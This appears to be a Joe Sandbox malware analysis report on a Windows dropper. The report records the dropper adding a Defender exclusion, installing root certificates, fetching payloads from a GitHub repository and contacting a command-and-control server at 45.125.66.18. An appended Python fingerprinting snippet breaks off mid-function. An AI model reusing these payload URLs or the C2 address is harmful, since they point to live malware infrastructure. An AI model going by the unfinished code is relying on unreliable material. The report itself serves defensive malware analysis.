Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\Desktop\1feP5qTCl0.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
MITRE ATT&CK Matrix (techniques listed per tactic; the number in parentheses is the count of signatures mapped to that technique)
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Command and Scripting Interpreter (2); Native API (21); PowerShell (1); Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Masquerading (1); Disable or Modify Tools (1); Modify Registry (1); Virtualization/Sandbox Evasion (131); Process Injection (11); Install Root Certificate (1); Software Packing (1); DLL Side-Loading (1)
Credential Access: Input Capture (11); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: Query Registry (1); Security Software Discovery (211); Process Discovery (2); Virtualization/Sandbox Evasion (131); Application Window Discovery (1); File and Directory Discovery (2); System Information Discovery (24); System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Input Capture (11); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Encrypted Channel (11); Ingress Tool Transfer (1); Non-Application Layer Protocol (3); Application Layer Protocol (14); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Behavior Graph (ID: 1499701, Sample: 1feP5qTCl0.exe, Start date: 27/08/2024, Architecture: WINDOWS, Score: 100)

Start
  • DNS: raw.githubusercontent.com; httpbin.org; github.com
  • Signatures: Multi AV Scanner detection for submitted file; AI detected suspicious sample; Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
  • Started: 1feP5qTCl0.exe

1feP5qTCl0.exe
  • Connections: github.com 140.82.121.3, 443, 49738 GITHUBUS United States; raw.githubusercontent.com 185.199.109.133, 443, 49730, 49731 FASTLYUS Netherlands; httpbin.org 34.194.69.213, 443, 49741 AMAZON-AESUS United States
  • Dropped: C:\Reka\rapnewsa.exe, PE32
  • Signatures: Suspicious powershell command line found; Installs new ROOT certificates; Adds a directory exclusion to Windows Defender
  • Started: rapnewsa.exe; powershell.exe; powershell.exe; 5 other processes

rapnewsa.exe
  • Connections: 45.125.66.18, 443, 49740 TELE-ASTeleAsiaLimitedHK Hong Kong
  • Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Found evasive API chain (may stop execution after checking mutex); 3 other signatures
  • Started: WerFault.exe

powershell.exe (first instance)
  • Signatures: Loading BitLocker PowerShell Module
  • Started: conhost.exe

powershell.exe (second instance)
  • Started: conhost.exe

5 other processes
  • Started: conhost.exe (three instances); 2 other processes

Source | Detection | Scanner | Label
1feP5qTCl0.exe | 11% | ReversingLabs |
1feP5qTCl0.exe | 8% | Virustotal |

Source | Detection | Scanner | Label
C:\Reka\rapnewsa.exe | 100% | Avira | HEUR/AGEN.1315917
C:\Reka\rapnewsa.exe | 100% | Joe Sandbox ML |
C:\Reka\rapnewsa.exe | 16% | ReversingLabs |
C:\Reka\rapnewsa.exe | 24% | Virustotal |

No Antivirus matches

Source | Detection | Scanner | Label
github.com | 0% | Virustotal |
raw.githubusercontent.com | 0% | Virustotal |
httpbin.org | 1% | Virustotal |

Source | Detection | Scanner | Label
https://httpbin.org/get | 0% | URL Reputation | safe
http://microsoft.co | 0% | Avira URL Cloud | safe
https://github.com/workhasf/kelm/raw/main/iconozave.exeraw.githubusercontent.comdefault-src | 0% | Avira URL Cloud | safe
https://45.125.66.18/l9 | 0% | Avira URL Cloud | safe
https://45.125.66.18/api/receiver/recv | 0% | Avira URL Cloud | safe
https://github.com | 0% | Avira URL Cloud | safe
https://raw.githubusercontent.com/workhasf/kelm/main/nepipirusas.json | 0% | Avira URL Cloud | safe
https://45.125.66.18/api/receiver/recvS | 0% | Avira URL Cloud | safe
https://github.com/workhasf/kelm/raw/main/iconozave.exeC: | 0% | Avira URL Cloud | safe
https://45.125.66.18/api/receiver/recv | 3% | Virustotal |
https://45.125.66.18:443/api/receiver/recv | 0% | Avira URL Cloud | safe
https://github.com | 0% | Virustotal |
https://github.com/workhasf/kelm/raw/main/iconozave.exe | 0% | Avira URL Cloud | safe
http://microsoft.co | 1% | Virustotal |
https://45.125.66.18/api/receiver/recvz | 0% | Avira URL Cloud | safe
https://raw.githubusercontent.com/workhasf/kelm/main/iconozave.exe | 0% | Avira URL Cloud | safe
https://raw.githubusercontent.com/workhasf/kelm/main/yjsefceawd.json | 0% | Avira URL Cloud | safe
https://raw.githubusercontent.com/workhasf/kelm/main/iconozave.exe | 1% | Virustotal |
https://github.com/workhasf/kelm/raw/main/iconozave.exe | 0% | Virustotal |
https://45.125.66.18:443/api/receiver/recv | 3% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
github.com | 140.82.121.3 | true | false | | unknown
raw.githubusercontent.com | 185.199.109.133 | true | false | | unknown
httpbin.org | 34.194.69.213 | true | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://httpbin.org/get | false | URL Reputation: safe | unknown
https://45.125.66.18/api/receiver/recv | false | 3%, Virustotal; Avira URL Cloud: safe | unknown
https://raw.githubusercontent.com/workhasf/kelm/main/nepipirusas.json | false | Avira URL Cloud: safe | unknown
https://github.com/workhasf/kelm/raw/main/iconozave.exe | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://raw.githubusercontent.com/workhasf/kelm/main/iconozave.exe | false | 1%, Virustotal; Avira URL Cloud: safe | unknown
https://raw.githubusercontent.com/workhasf/kelm/main/yjsefceawd.json | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://45.125.66.18/l9 | rapnewsa.exe, 00000013.00000002.2038436475.00000000011A8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/workhasf/kelm/raw/main/iconozave.exeraw.githubusercontent.comdefault-src | 1feP5qTCl0.exe, 00000000.00000002.2050595870.000000C00020C000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://microsoft.co | rapnewsa.exe, 00000013.00000002.2038436475.00000000011D6000.00000004.00000020.00020000.00000000.sdmp | false | 1%, Virustotal; Avira URL Cloud: safe | unknown
https://github.com | 1feP5qTCl0.exe, 00000000.00000002.2050595870.000000C00020C000.00000004.00001000.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://45.125.66.18/api/receiver/recvS | rapnewsa.exe, 00000013.00000002.2038436475.000000000118E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/workhasf/kelm/raw/main/iconozave.exeC: | 1feP5qTCl0.exe, 00000000.00000002.2048398307.000000C00000E000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://45.125.66.18:443/api/receiver/recv | rapnewsa.exe, 00000013.00000002.2038436475.00000000011CA000.00000004.00000020.00020000.00000000.sdmp | false | 3%, Virustotal; Avira URL Cloud: safe | unknown
https://45.125.66.18/api/receiver/recvz | rapnewsa.exe, 00000013.00000002.2038436475.00000000011A8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.199.109.133 | raw.githubusercontent.com | Netherlands | 54113 | FASTLYUS | false
34.194.69.213 | httpbin.org | United States | 14618 | AMAZON-AESUS | false
140.82.121.3 | github.com | United States | 36459 | GITHUBUS | false
45.125.66.18 | unknown | Hong Kong | 133398 | TELE-ASTeleAsiaLimitedHK | false
Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1499701
Start date and time:2024-08-27 12:54:14 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 54s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:25
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:1feP5qTCl0.exe
renamed because original name is a hash value
Original Sample Name:64aaffe3b4d705b9ddbce60e8fd8b9829c20438b8c68ae254e185c0f466e0265.exe
Detection:MAL
Classification:mal100.evad.winEXE@25/31@3/4
EGA Information:
  • Successful, ratio: 50%
HCA Information:Failed
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
  • Execution Graph export aborted for target 1feP5qTCl0.exe, PID 6120 because it is empty
  • Not all processes were analyzed, report is missing behavior information
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtCreateKey calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
06:55:11 | API Interceptor | 94x Sleep call for process: powershell.exe modified
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| 185.199.109.133 | https://github.com/angryip/ipscan/releases/download/3.9.1/ipscan-3.9.1-setup.exe | malicious | Unknown | |
| 185.199.109.133 | SecuriteInfo.com.Trojan-Downloader.Win32.Agent.xycwio.1244.6578.exe | malicious | Coinhive | |
| 185.199.109.133 | https://energyservices.org/ | malicious | HTMLPhisher | |
| 185.199.109.133 | https://energyservices.org/ | malicious | HTMLPhisher | |
| 185.199.109.133 | ep_setup.exe | malicious | Unknown | |
| 185.199.109.133 | http://yathuchandran.github.io/Metamask.clone | malicious | Unknown | |
| 185.199.109.133 | http://web3linksync.pages.dev/ | malicious | Unknown | |
| 185.199.109.133 | Neverlose.exe | malicious | XWorm | |
| 185.199.109.133 | Electronic_Receipt_ATT0001.htm | malicious | HTMLPhisher | |
| 185.199.109.133 | https://app.supercast.com/ahoy/messages/NuCwMXL7H9TYxRcbnPV2HNBC27R3XTJ7/click?signature=a81c8ff09c7aec0f320b61cbf7dd42e1a041100b&url=https://nursematte.com/asdbhewjcjfnjernfreddbecje/cloudflare-antibot#Kirsten.stevens+sueryder.org | malicious | HTMLPhisher | |
| 140.82.121.36 | glRBXzk6i.exe | malicious | RedLine | github.com/dyrka314/Balumba/releases/download/ver2/encrypted_ImpulseCrypt_5527713376.2.exe |
| 140.82.121.36 | firefox.lnk | malicious | CobaltStrike | github.com/john-xor/temp/blob/main/index.html?raw=true |
| 140.82.121.36 | 0XzeMRyE1e.exe | malicious | Amadey, Vidar | github.com/neiqops/ajajaj/raw/main/file_22613.exe |
| 140.82.121.36 | MzRn1YNrbz.exe | malicious | Vidar | github.com/AdobeInstal/Adobe-After-Effects-CC-2022-1.4/releases/download/123/Software.exe |
| 140.82.121.36 | RfORrHIRNe.doc | malicious | Unknown | github.com/ssbb36/stv/raw/main/5.mp3 |
| 45.125.66.18 | V6ZsDcgx4N.exe | malicious | Unknown | |
| 45.125.66.18 | V6ZsDcgx4N.exe | malicious | Unknown | |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| raw.githubusercontent.com | SecuriteInfo.com.Trojan-Downloader.Win32.Agent.xycwio.1244.6578.exe | malicious | Coinhive | 185.199.109.133 |
| raw.githubusercontent.com | SecuriteInfo.com.Trojan-Downloader.Win32.Agent.xycwio.1244.6578.exe | malicious | Coinhive | 185.199.111.133 |
| raw.githubusercontent.com | SecuriteInfo.com.Trojan-PSW.Win32.Stealer.cifv.26324.32739.exe | malicious | Phemedrone Stealer | 185.199.108.133 |
| raw.githubusercontent.com | Neverlose.exe | malicious | XWorm | 185.199.109.133 |
| raw.githubusercontent.com | N8LgG4xO0F.exe | malicious | DCRat, PureLog Stealer, zgRAT | 185.199.111.133 |
| raw.githubusercontent.com | SecuriteInfo.com.Win64.Evo-gen.11830.19095.exe | malicious | Python Stealer, Monster Stealer | 185.199.108.133 |
| raw.githubusercontent.com | FlashUpdates.js | malicious | Unknown | 185.199.109.133 |
| raw.githubusercontent.com | 1U34vTVJ97.pdf | malicious | Unknown | 185.199.110.133 |
| raw.githubusercontent.com | Ld0f3NDosJ.exe | malicious | Unknown | 185.199.108.133 |
| raw.githubusercontent.com | OD8uS0ksdv.exe | malicious | Unknown | 185.199.111.133 |
| github.com | https://github.com/angryip/ipscan/releases/download/3.9.1/ipscan-3.9.1-setup.exe | malicious | Unknown | 140.82.121.4 |
| github.com | https://energyservices.org/ | malicious | HTMLPhisher | 140.82.121.3 |
| github.com | https://slopeofhope.com/commentsys/lnk.php?u=https://haconsultores.com.mx/legend/maxwell/ldpzbsp/michaelm@umcu.org&c=E,1,A_Yp496oib_-f1w3pZp4Hud2rskHoBUUu9m1zLjByrw-OpNq6TJQE-QgWUsuKigOG1mWiTep0uj-kK8C5-LvX_Bqh-uGvKRKtcnVwRDbXNCSMFYS3grZceoYqs0,&typo=1 | malicious | HTMLPhisher | 140.82.121.4 |
| github.com | https://energyservices.org/ | malicious | HTMLPhisher | 140.82.121.3 |
| github.com | http://chengduyiwokeji-haiwai.datasink.datasjourney.com | malicious | Unknown | 140.82.121.3 |
| github.com | ep_setup.exe | malicious | Unknown | 140.82.121.4 |
| github.com | SecuriteInfo.com.Trojan-PSW.Win32.Stealer.cifv.26324.32739.exe | malicious | Phemedrone Stealer | 140.82.121.3 |
| github.com | http://web3linksync.pages.dev/ | malicious | Unknown | 140.82.121.4 |
| httpbin.org | IDMCRK.exe | malicious | Fredy Stealer | 3.224.242.112 |
| httpbin.org | IDMCRK.exe | malicious | Fredy Stealer | 3.224.242.112 |
| httpbin.org | Quarantined Messages(1).zip | malicious | Unknown | 107.23.72.23 |
| httpbin.org | visabuilder.exe | malicious | Python Stealer, Discord Token Stealer | 54.86.243.105 |
| httpbin.org | IDM_ACT.exe | malicious | Fredy Stealer | 54.243.255.141 |
| httpbin.org | IDM_ACT.exe | malicious | Fredy Stealer | 54.86.243.105 |
| httpbin.org | https://maisontrouvaille8.wordpress.com/ | malicious | Unknown | 54.243.255.141 |
| httpbin.org | https://addtocartcommerce.wordpress.com/ | malicious | Unknown | 54.243.255.141 |
| httpbin.org | idman642build18Full.exe | malicious | Fredy Stealer | 54.86.243.105 |
| httpbin.org | idman642build18Full.exe | malicious | Fredy Stealer | 54.243.255.141 |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| AMAZON-AESUS | Money Fellows Signatures Consent Docs#122531(Revised).pdf | malicious | Unknown | 23.22.254.206 |
| AMAZON-AESUS | https://n3ki6w9.r.ap-northeast-2.awstrack.me/L0/https:%2F%2Fet.sp-25.com%2Fe%2Fc%2FOTizp%3FreferCode=product_OT2211aaaaaaaaaa%26shortLink=aaaaa%26longLink=H4sIAAAAAAAAAAXBWxLAEAwAwBNFCFP0Np7DhzLC_bvbzln8IvKCeQSPsM-63EoeIs2BYXW8H9_IafdYUCotqyUCW00Co8wDzmUFkhJ58qVqo35jyZFkUwAAAA==%26ecSource=OT%26referId=8725724309822211/1/010c01918f3a3e79-f24b6623-ae8f-4f46-a748-e9746a6021e2-000000/4Oo6Bk-hd_o5oOs3lBvVzZAlIjU=173 | malicious | Unknown | 54.165.190.241 |
| AMAZON-AESUS | https://indd.adobe.com/view/9cfcac35-338b-4a63-bb28-60a870b890db | malicious | HTMLPhisher | 23.22.254.206 |
| AMAZON-AESUS | https://we.tl/t-RErWU1YgQS | malicious | Unknown | 34.202.209.143 |
| AMAZON-AESUS | https://wavebrowser.co/ | malicious | Unknown | 3.222.199.46 |
| AMAZON-AESUS | http://stream.crichd.vip/update/sscricket.php | malicious | Unknown | 34.232.140.51 |
| AMAZON-AESUS | virus total.pdf | malicious | HTMLPhisher | 23.22.254.206 |
| AMAZON-AESUS | CMB Monaco Signatures Consent Docs#299229(Revised).pdf | malicious | Unknown | 52.202.204.11 |
| AMAZON-AESUS | https://messaging-security.comano.us/XdEtiQ3I4emJ5ZldQUWF3SmcwOEQ4cURsb24rSWYyY2loVzV5bktYMlpLSlVxalNnL1RabENaQmozTzkvS3FhK1Z5ZTJDZHlNa1VGbnJDL1g3ZHBLdXdYNUJJbXVhckp5RmFuam41SWhoR0tQUTVWSmNSeEdVdXp3ZmV3eksreWs4dlFnVTBqZG8xUDdFZU9sN1JGZUNtUGdHQnZsVVJLRHREbFNUQm54UWtMa3dmdFNwVENxQTRLaFh3PT0tLUd4TXFReTErSUVBOTZZdDQtLWFZbmE1c254RWIwVWNyTkhyVHN0TUE9PQ==?cid=2140479915 | malicious | Unknown | 52.207.82.236 |
| AMAZON-AESUS | SecuriteInfo.com.Trojan-Downloader.Win32.Agent.xycwio.1244.6578.exe | malicious | Coinhive | 3.222.64.100 |
| FASTLYUS | https://indd.adobe.com/view/9cfcac35-338b-4a63-bb28-60a870b890db | malicious | HTMLPhisher | 151.101.66.137 |
| FASTLYUS | https://we.tl/t-RErWU1YgQS | malicious | Unknown | 199.232.188.84 |
| FASTLYUS | http://ebay.to/3u2gAme | malicious | Unknown | 199.232.188.84 |
| FASTLYUS | https://github.com/angryip/ipscan/releases/download/3.9.1/ipscan-3.9.1-setup.exe | malicious | Unknown | 185.199.109.133 |
| FASTLYUS | http://stream.crichd.vip/update/sscricket.php | malicious | Unknown | 151.101.129.229 |
| FASTLYUS | virus total.pdf | malicious | HTMLPhisher | 199.232.210.172 |
| FASTLYUS | Electronic_Receipt_ATT0001.htm | malicious | Unknown | 104.244.43.131 |
| FASTLYUS | https://messaging-security.comano.us/XdEtiQ3I4emJ5ZldQUWF3SmcwOEQ4cURsb24rSWYyY2loVzV5bktYMlpLSlVxalNnL1RabENaQmozTzkvS3FhK1Z5ZTJDZHlNa1VGbnJDL1g3ZHBLdXdYNUJJbXVhckp5RmFuam41SWhoR0tQUTVWSmNSeEdVdXp3ZmV3eksreWs4dlFnVTBqZG8xUDdFZU9sN1JGZUNtUGdHQnZsVVJLRHREbFNUQm54UWtMa3dmdFNwVENxQTRLaFh3PT0tLUd4TXFReTErSUVBOTZZdDQtLWFZbmE1c254RWIwVWNyTkhyVHN0TUE9PQ==?cid=2140479915 | malicious | Unknown | 199.232.196.193 |
| FASTLYUS | SecuriteInfo.com.Trojan-Downloader.Win32.Agent.xycwio.1244.6578.exe | malicious | Coinhive | 185.199.109.133 |
| FASTLYUS | SecuriteInfo.com.Trojan-Downloader.Win32.Agent.xycwio.1244.6578.exe | malicious | Coinhive | 185.199.111.133 |
| TELE-ASTeleAsiaLimitedHK | V6ZsDcgx4N.exe | malicious | Unknown | 45.125.66.18 |
| TELE-ASTeleAsiaLimitedHK | V6ZsDcgx4N.exe | malicious | Unknown | 45.125.66.18 |
| TELE-ASTeleAsiaLimitedHK | https://57365oo.cc/ | malicious | Phisher | 45.125.65.213 |
| TELE-ASTeleAsiaLimitedHK | zte.arm7.elf | malicious | Unknown | 45.125.66.78 |
| TELE-ASTeleAsiaLimitedHK | Kxk45K3cAx.elf | malicious | Gafgyt, Mirai | 45.125.66.223 |
| TELE-ASTeleAsiaLimitedHK | NVu6VqOPCN.elf | malicious | Gafgyt, Mirai | 45.125.66.223 |
| TELE-ASTeleAsiaLimitedHK | 4A4hEAVRnJ.elf | malicious | Gafgyt, Mirai | 45.125.66.223 |
| TELE-ASTeleAsiaLimitedHK | Y6dJm8taZO.elf | malicious | Gafgyt, Mirai | 45.125.66.223 |
| TELE-ASTeleAsiaLimitedHK | 2Ipy5SuBUQ.elf | malicious | Gafgyt, Mirai | 45.125.66.223 |
| TELE-ASTeleAsiaLimitedHK | KgIQ7WeeC1.elf | malicious | Gafgyt, Mirai | 45.125.66.223 |
| GITHUBUS | https://github.com/angryip/ipscan/releases/download/3.9.1/ipscan-3.9.1-setup.exe | malicious | Unknown | 140.82.121.4 |
| GITHUBUS | https://energyservices.org/ | malicious | HTMLPhisher | 140.82.121.3 |
| GITHUBUS | https://slopeofhope.com/commentsys/lnk.php?u=https://haconsultores.com.mx/legend/maxwell/ldpzbsp/michaelm@umcu.org&c=E,1,A_Yp496oib_-f1w3pZp4Hud2rskHoBUUu9m1zLjByrw-OpNq6TJQE-QgWUsuKigOG1mWiTep0uj-kK8C5-LvX_Bqh-uGvKRKtcnVwRDbXNCSMFYS3grZceoYqs0,&typo=1 | malicious | HTMLPhisher | 140.82.121.4 |
| GITHUBUS | https://github.com/massgravel/Microsoft-Activation-Scripts | malicious | Unknown | 140.82.112.21 |
| GITHUBUS | https://energyservices.org/ | malicious | HTMLPhisher | 140.82.121.3 |
| GITHUBUS | ep_setup.exe | malicious | Unknown | 140.82.121.4 |
| GITHUBUS | SecuriteInfo.com.Trojan-PSW.Win32.Stealer.cifv.26324.32739.exe | malicious | Phemedrone Stealer | 140.82.121.3 |
| GITHUBUS | http://yathuchandran.github.io/Metamask.clone | malicious | Unknown | 140.82.114.21 |
| GITHUBUS | http://web3linksync.pages.dev/ | malicious | Unknown | 140.82.121.4 |
| GITHUBUS | Neverlose.exe | malicious | XWorm | 140.82.121.4 |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| 72a589da586844d7f0818ce684948eea | V6ZsDcgx4N.exe | malicious | Unknown | 45.125.66.18 |
| 72a589da586844d7f0818ce684948eea | V6ZsDcgx4N.exe | malicious | Unknown | 45.125.66.18 |
| 72a589da586844d7f0818ce684948eea | 48DhuEoTcX.exe | malicious | Metasploit, Meterpreter | 45.125.66.18 |
| 72a589da586844d7f0818ce684948eea | 6863(1)2.exe | malicious | CobaltStrike | 45.125.66.18 |
| 72a589da586844d7f0818ce684948eea | 20240730#U7cfb#U7edf#U5f02#U5e38#U62a5#U9519.exe | malicious | CobaltStrike | 45.125.66.18 |
| 72a589da586844d7f0818ce684948eea | LisectAVT_2403002B_116.exe | malicious | Unknown | 45.125.66.18 |
| 72a589da586844d7f0818ce684948eea | LisectAVT_2403002B_116.exe | malicious | Unknown | 45.125.66.18 |
| 72a589da586844d7f0818ce684948eea | LisectAVT_2403002B_312.dll | malicious | Trickbot | 45.125.66.18 |
| 72a589da586844d7f0818ce684948eea | 2new.dll.dll | malicious | CobaltStrike | 45.125.66.18 |
| 72a589da586844d7f0818ce684948eea | havoc_x64.exe | malicious | Havoc | 45.125.66.18 |
                          No context
                          Process:C:\Users\user\Desktop\1feP5qTCl0.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):38912
                          Entropy (8bit):5.972409904582663
                          Encrypted:false
                          SSDEEP:768:ZCMmeyIJkkZ7XPImohfdjm7MEW/kJ7S/DWJ3GTHvvM1zI:ZCFeySkkJgl2MEW/ozwXM1
                          MD5:2D4E723C184D9403B078E53F2DE74A23
                          SHA1:92FA5F8F346CB987F249BD41755C5AEDAF4C8646
                          SHA-256:0A6BF0678BBD793E39A84DFB4C71D8B709D9E538288BF826C48B1BA899803BA4
                          SHA-512:A8F5267AE7F465A65A46D6ABEAED0C7A910C349E708E4264CC68747EE26DB78D62B575DEDB2E64553C207B914BA240654930774954DFA7503C93393CFADCE9AD
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 16%
                          • Antivirus: Virustotal, Detection: 24%, Browse
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................n...............n.....n....Rich..................PE..L...PS.f...............&............0.............@.......................................@.....................................................................X.......................................................p............................text............................... ..`.rdata..............................@..@.data...D...........................@....reloc..X...........................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:modified
                          Size (bytes):64
                          Entropy (8bit):0.34726597513537405
                          Encrypted:false
                          SSDEEP:3:Nlll:Nll
                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                          Malicious:false
                          Preview:@...e...........................................................
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
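An added example, not part of the Joe Sandbox report, that reproduces the per-file fields listed in these entries (size, MD5, SHA1, SHA-256, SHA-512, 8-bit entropy, and the File Type string for a PE) so a dropped file can be checked against the values the report prints. It uses the 60-byte __PSScriptPolicyTest content above as constructed input; the trailing space is not visible in the Preview field but is required by the listed size (60 bytes) and entropy (4.0389...), which only fit the string with it. The "encrypted" threshold of 7.5 bits/byte and build_stub_pe(), a minimal PE header built only for this example, are assumptions of the example, not the sandbox's own logic.

```python
import hashlib
import math
import struct

# Constructed sample input: the content of the __PSScriptPolicyTest file listed
# above. The report's Preview field drops the trailing space; the listed size
# (60 bytes) and entropy (4.0389...) only fit the string with it present.
APPLOCKER_TEST = b"# PowerShell test file to determine AppLocker lockdown mode "


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte, 0.0 (constant) to 8.0 (uniform)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def fingerprint(data: bytes, encrypted_threshold: float = 7.5) -> dict:
    """The per-file fields the report lists: size, MD5/SHA1/SHA-256/SHA-512 and
    entropy. 'encrypted' is a plain high-entropy heuristic; the 7.5 cut-off is an
    assumption for this example, not the sandbox's own rule."""
    ent = shannon_entropy(data)
    return {
        "size": len(data),
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
        "sha512": hashlib.sha512(data).hexdigest(),
        "entropy": ent,
        "encrypted": ent > encrypted_threshold,
    }


MACHINES = {0x014C: "Intel 80386", 0x8664: "x86-64", 0x01C4: "ARM", 0xAA64: "Aarch64"}
SUBSYSTEMS = {2: "GUI", 3: "console"}


def pe_file_type(data: bytes):
    """Classify a PE image the way the report's File Type field does
    (e.g. 'PE32 executable (GUI) Intel 80386, for MS Windows'); None if not PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    # COFF file header: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    machine, _, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    if opt_size < 70 or opt + opt_size > len(data):
        return None
    (magic,) = struct.unpack_from("<H", data, opt)           # 0x10B = PE32, 0x20B = PE32+
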